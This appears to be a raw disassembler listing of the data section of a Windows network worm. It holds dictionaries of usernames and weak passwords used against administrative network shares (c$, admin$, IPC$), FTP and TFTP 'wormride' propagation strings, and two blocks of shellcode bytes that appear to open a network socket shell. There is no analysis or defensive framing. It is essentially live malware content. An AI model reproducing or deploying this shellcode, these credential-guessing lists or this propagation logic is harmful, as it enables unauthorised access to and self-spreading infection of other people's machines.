dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 1013C79h, 909008EBh
dd 767A1567h, 90909090h, 0EB909090h, 48909008h, 9088444Fh
dd 4 dup(90909090h), 0
dd 7E0h, 4, 2 dup(0)
aFb db 'fìÐ',7,0
align 10h
dd 129F74h, 0
dd 127D78h, 0
dd 5B03EB60h, 0F8E8C353h, 31FFFFFFh, 13404C0h, 315B50D8h
dd 401002D2h, 50403002h, 4104C031h, 0C628C228h, 6604E2C0h
dd 3104EAC1h, 2F630C0h, 66032803h, 58431301h, 802C931h
dd 61D5E0h, 77BD3143h, 7FCh, 0C0314301h, 7FC77h, 4F020100h
dd 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 ; DATA XREF: sub_410F60+A3�r
db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix_0 ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_1 ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aGod ; "god"
dd offset aDomain ; "domain"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aData ; "data"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aMain ; "main"
dd offset aLan_0 ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aOwner ; "owner"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC ; "c$"
dd offset aD ; "d$"
dd offset aE ; "e$"
dd offset aCShared ; "c$\\shared"
dd offset aDShared ; "d$\\shared"
dd offset aEShared ; "e$\\shared"
dd offset aCWinnt ; "c$\\winnt"
dd offset aCWindows ; "c$\\windows"
dd offset aCWinntSystem32 ; "c$\\winnt\\system32"
dd offset aCWindowsSystem ; "c$\\windows\\system32"
dd offset aAdminSystem32 ; "Admin$\\system32"
dd offset aAdmin_0 ; "admin$"
dd offset aCDocumentsAndS ; "C$\\Documents and Settings\\All Users\\Doc"...
dd offset aPrint ; "print$"
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DE30
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aA_1 ; "a"
dd offset aAb ; "ab"
dd offset aAbc ; "abc"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aDba ; "dba"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1_0 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset aWork ; "work"
dd offset aDeadline ; "deadline"
dd offset aPayday ; "payday"
dd offset aSecret ; "secret"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset a2005 ; "2005"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix_0 ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_1 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin_0 ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aMoney ; "money"
dd offset aLove ; "love"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan_0 ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aOwner ; "owner"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0 ; DATA XREF: .data:0041BF5C�o
aBlank db 'blank',0 ; DATA XREF: .data:0041BF58�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: .data:0041BF4C�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:0041BF48�o
align 10h
aHp db 'hp',0 ; DATA XREF: .data:0041BF44�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0041BF28�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0041BF24�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:0041BF18�o
align 4
aDb2 db 'db2',0 ; DATA XREF: .data:0041BF14�o
aDb1 db 'db1',0 ; DATA XREF: .data:0041BF10�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0041BF0C�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0041BF04�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0041BF00�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:0041BEFC�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0041BEF0�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0041BEEC�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:0041BEE4�o
align 10h
aHell db 'hell',0 ; DATA XREF: .data:0041BEE0�o
align 4
aLove db 'love',0 ; DATA XREF: .data:0041BEDC�o
align 10h
aMoney db 'money',0 ; DATA XREF: .data:0041BED8�o
align 4
aSlut db 'slut',0 ; DATA XREF: .data:0041BECC�o
align 10h
aBitch db 'bitch',0 ; DATA XREF: .data:0041BEC8�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0041BEC4�o
align 10h
aExchange db 'exchange',0 ; DATA XREF: .data:0041BEC0�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0041BEB4�o
align 4
aLogin_0 db 'login',0 ; DATA XREF: .data:0041BEB0�o
align 10h
aQwe db 'qwe',0 ; DATA XREF: .data:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: .data:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: .data:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: .data:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .data:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: .data:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: .data:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: .data:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .data:0041BE00�o
aSex db 'sex',0 ; DATA XREF: .data:0041BDFC�o
; .data:0041BED0�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: .data:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: .data:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: .data:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: .data:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: .data:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0041BDB4�o
align 10h
aTest db 'test',0 ; DATA XREF: .data:0041BDA8�o
align 4
a2005 db '2005',0 ; DATA XREF: .data:0041BDA4�o
align 10h
a2004 db '2004',0 ; DATA XREF: .data:0041BDA0�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0041BD94�o
align 10h
aSecret db 'secret',0 ; DATA XREF: .data:0041BD8C�o
align 4
aPayday db 'payday',0 ; DATA XREF: .data:0041BD88�o
align 10h
aDeadline db 'deadline',0 ; DATA XREF: .data:0041BD84�o
align 4
aWork db 'work',0 ; DATA XREF: .data:0041BD80�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:0041BD7C�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .data:0041BD78�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .data:0041BD74�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:0041BD70�o
a123456 db '123456',0 ; DATA XREF: .data:0041BD6C�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0041BD68�o
align 10h
a1234 db '1234',0 ; DATA XREF: .data:0041BD64�o
align 4
a123 db '123',0 ; DATA XREF: .data:0041BD60�o
a12 db '12',0 ; DATA XREF: .data:0041BD5C�o
align 10h
a1_0: ; DATA XREF: .data:0041BD58�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:0041BD54�o
aPwd db 'pwd',0 ; DATA XREF: .data:0041BD50�o
aPass_0 db 'pass',0 ; DATA XREF: .data:0041BD4C�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0041BD48�o
align 10h
aDba db 'dba',0 ; DATA XREF: .data:0041BD44�o
aPasswd db 'passwd',0 ; DATA XREF: .data:0041BD40�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0041BD3C�o
; .data:0041D790�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:0041BD38�o
align 4
aAbc db 'abc',0 ; DATA XREF: .data:0041BD34�o
aAb db 'ab',0 ; DATA XREF: .data:0041BD30�o
align 4
aA_1: ; DATA XREF: .data:0041BD2C�o
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: .data:0041BD04�o
align 4
aPrint db 'print$',0 ; DATA XREF: .data:0041BD00�o
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
; DATA XREF: .data:0041BCFC�o
aAdmin_0 db 'admin$',0 ; DATA XREF: .data:0041BCF8�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: .data:0041BCF4�o
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: .data:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: .data:0041BCEC�o
align 10h
aCWindows db 'c$\windows',0 ; DATA XREF: .data:0041BCE8�o
align 4
aCWinnt db 'c$\winnt',0 ; DATA XREF: .data:0041BCE4�o
align 4
aEShared db 'e$\shared',0 ; DATA XREF: .data:0041BCE0�o
align 4
aDShared db 'd$\shared',0 ; DATA XREF: .data:0041BCDC�o
align 10h
aCShared db 'c$\shared',0 ; DATA XREF: .data:0041BCD8�o
align 4
aE db 'e$',0 ; DATA XREF: .data:0041BCD4�o
align 10h
aD db 'd$',0 ; DATA XREF: .data:0041BCD0�o
align 4
aC db 'c$',0 ; DATA XREF: .data:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0041BCC4�o
; .data:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .data:0041BCC0�o
; .data:0041BF78�o
aOwner db 'owner',0 ; DATA XREF: .data:0041BCBC�o
; .data:0041BF74�o
align 10h
aStudent db 'student',0 ; DATA XREF: .data:0041BCB8�o
; .data:0041BF70�o
aIntranet db 'intranet',0 ; DATA XREF: .data:0041BCB4�o
; .data:0041BF6C�o
align 4
aLan_0 db 'lan',0 ; DATA XREF: .data:0041BCAC�o
; .data:0041BF64�o
aMain db 'main',0 ; DATA XREF: .data:0041BCA8�o
; .data:0041BF60�o
align 10h
aOffice db 'office',0 ; DATA XREF: .data:0041BCA4�o
; .data:0041BF54�o
align 4
aControl db 'control',0 ; DATA XREF: .data:0041BCA0�o
; .data:0041BF50�o
aSiemens db 'siemens',0 ; DATA XREF: .data:0041BC9C�o
; .data:0041BF40�o
aCompaq db 'compaq',0 ; DATA XREF: .data:0041BC98�o
; .data:0041BF3C�o
align 10h
aDell db 'dell',0 ; DATA XREF: .data:0041BC94�o
; .data:0041BF38�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .data:0041BC90�o
; .data:0041BF34�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: .data:0041BC8C�o
; .data:0041BF30�o
aOracle db 'oracle',0 ; DATA XREF: .data:0041BC88�o
; .data:0041BF2C�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:0041BC84�o
; .data:0041BF20�o
aSa db 'sa',0 ; DATA XREF: .data:0041BC80�o
; .data:0041BF1C�o
align 4
aData db 'data',0 ; DATA XREF: .data:0041BC7C�o
; .data:0041BF08�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0041BC78�o
; .data:0041BEF8�o
align 4
aDatabase db 'database',0 ; DATA XREF: .data:0041BC74�o
; .data:0041BEF4�o
align 10h
aDomain db 'domain',0 ; DATA XREF: .data:0041BC70�o
; .data:0041BEE8�o
align 4
aGod db 'god',0 ; DATA XREF: .data:0041BC6C�o
; .data:0041BED4�o
aBackup db 'backup',0 ; DATA XREF: .data:0041BC68�o
; .data:0041BEBC�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0041BC64�o
; .data:0041BEB8�o
align 10h
aMary db 'mary',0 ; DATA XREF: .data:0041BC60�o
; .data:0041BEAC�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:0041BC5C�o
; .data:0041BEA8�o
align 10h
aKate db 'kate',0 ; DATA XREF: .data:0041BC54�o
; .data:0041BEA0�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:0041BC50�o
; .data:0041BE9C�o
align 10h
aEric db 'eric',0 ; DATA XREF: .data:0041BC4C�o
; .data:0041BE98�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0041BC48�o
; .data:0041BDB0�o
align 10h
aGuest db 'guest',0 ; DATA XREF: .data:0041BC44�o
; .data:0041BDAC�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:0041BC40�o
; .data:0041BE94�o
align 10h
aIan db 'ian',0 ; DATA XREF: .data:0041BC3C�o
; .data:0041BE90�o
aNeil db 'neil',0 ; DATA XREF: .data:0041BC38�o
; .data:0041BE8C�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:0041BC34�o
; .data:0041BE88�o
aBrian db 'brian',0 ; DATA XREF: .data:0041BC30�o
; .data:0041BE84�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:0041BC28�o
; .data:0041BE7C�o
align 10h
aSue db 'sue',0 ; DATA XREF: .data:0041BC24�o
; .data:0041BE78�o
aSam db 'sam',0 ; DATA XREF: .data:0041BC20�o
; .data:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: .data:0041BC1C�o
; .data:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .data:0041BC18�o
; .data:0041BC2C�o ...
align 4
aJohn db 'john',0 ; DATA XREF: .data:0041BC14�o
; .data:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: .data:0041BC10�o
; .data:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0041BC0C�o
; .data:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: .data:0041BC08�o
; .data:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:0041BC04�o
; .data:0041BE58�o
aJen db 'jen',0 ; DATA XREF: .data:0041BC00�o
; .data:0041BE54�o
aBob db 'bob',0 ; DATA XREF: .data:0041BBFC�o
; .data:0041BC58�o ...
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0041BBF8�o
; .data:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .data:0041BBF4�o
; .data:0041BE1C�o
aUser_1 db 'user',0 ; DATA XREF: .data:0041BBF0�o
; .data:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0041BBEC�o
; .data:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0041BBE8�o
; .data:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0041BBE4�o
; .data:0041BCB0�o ...
align 10h
aWww db 'www',0 ; DATA XREF: .data:0041BBE0�o
; .data:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: .data:0041BBDC�o
; .data:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: .data:0041BBD8�o
; .data:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: .data:0041BBD4�o
; .data:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0041BBCC�o
; .data:0041BDC0�o
align 10h
aUnix_0 db 'unix',0 ; DATA XREF: .data:0041BBC8�o
; .data:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0041BBC4�o
; .data:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0041BBC0�o
; .data:0041BD28�o
aAdmin db 'admin',0 ; DATA XREF: .data:0041BBBC�o
; .data:0041BD24�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: .data:0041BBB8�o
; .data:0041BD20�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:0041BBB4�o
; .data:0041BD1C�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0041BBB0�o
; .data:0041BD18�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:0041BBAC�o
; .data:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:0041BBA8�o
; .data:0041BD10�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: .text:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: .text:0041197E�o
dword_41C514 dd 135A78h ; DATA XREF: .text:0041196F�r
align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: .text:00411948�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: .text:00411943�o
dword_41C54C dd 157728h ; DATA XREF: .text:00411879�r
dd 2 dup(0)
a226 db '226 -',0Dh,0Ah,0 ; DATA XREF: .text:00411832�o
; .text:004118E5�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: .text:004117EA�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: .text:00411702�o
; .text:0041188C�o
dword_41C5DC dd 146AF8h ; DATA XREF: .text:004116EF�r
dd 2 dup(0)
a213U db '213 %u',0Dh,0Ah,0 ; DATA XREF: .text:004116A8�o
align 4
dword_41C5F4 dd 1227B0h ; DATA XREF: .text:00411628�r
align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: .text:00411562�o
align 4
dword_41C614 dd 0F6578h ; DATA XREF: .text:00411525�r
align 10h
a425 db '425 -',0Dh,0Ah,0 ; DATA XREF: .text:004114DE�o
dword_41C628 dd 0FED08h ; DATA XREF: .text:004114CF�r
dd 2 dup(0)
a200 db '200 -',0Dh,0Ah,0 ; DATA XREF: .text:00411488�o
; .text:004115E1�o
dword_41C63C dd 128230h ; DATA XREF: .text:00411479�r
dd 2 dup(0)
a257 db '257 "/" -',0Dh,0Ah,0 ; DATA XREF: .text:00411432�o
dword_41C654 dd 1F738h ; DATA XREF: .text:00411423�r
dd 0
a211 db '211 -',0Dh,0Ah,0 ; DATA XREF: .text:004113DC�o
dword_41C664 dd 1232B8h ; DATA XREF: .text:004113CD�r
align 10h
a215 db '215 -',0Dh,0Ah,0 ; DATA XREF: .text:00411386�o
dword_41C678 dd 124AF8h ; DATA XREF: .text:00411377�r
dd 2 dup(0)
a230 db '230 -',0Dh,0Ah,0 ; DATA XREF: .text:0041131C�o
dword_41C68C dd 0FECD8h ; DATA XREF: .text:00411303�r
dd 2 dup(0)
a331 db '331 -',0Dh,0Ah,0 ; DATA XREF: .text:004112BC�o
dword_41C6A0 dd 163AE8h ; DATA XREF: .text:004112A6�r
dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; DATA XREF: .text:00411224�o
; .text:00411250�o ...
a220 db '220 -',0Dh,0Ah,0 ; DATA XREF: .text:0041114E�o
a230_0 db '230',0 ; DATA XREF: sub_411A09+193�o
aPass1 db 'PASS 1',0Dh,0Ah,0 ; DATA XREF: sub_411A09+11D�o
align 4
a331_0 db '331',0 ; DATA XREF: sub_411A09+F9�o
aUser1 db 'USER 1',0Dh,0Ah,0 ; DATA XREF: sub_411A09:loc_411A8A�o
align 4
a220_0 db '220',0 ; DATA XREF: sub_411A09+63�o
unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
dword_41C724 dd 4000500h, 7868746Bh, 0 ; DATA XREF: .text:004123A7�o
unk_41C730 db 2Dh ; - ; DATA XREF: .text:00412382�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: .text:0041237D�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: .text:0041212C�o
aOctet db 'octet',0 ; DATA XREF: .text:004120F8�o
; .text:0041210A�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: .text:00411F09�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
dword_41C7C8 dd 0B915EBh, 81000000h, 0F1h, 74805E00h, 0E200FF31h, 0E805EBF9h
; DATA XREF: sub_4125DF+50�o
dd 0FFFFFFE6h, 0
dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
dd 0E5FFh
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
dd 0E5FFh
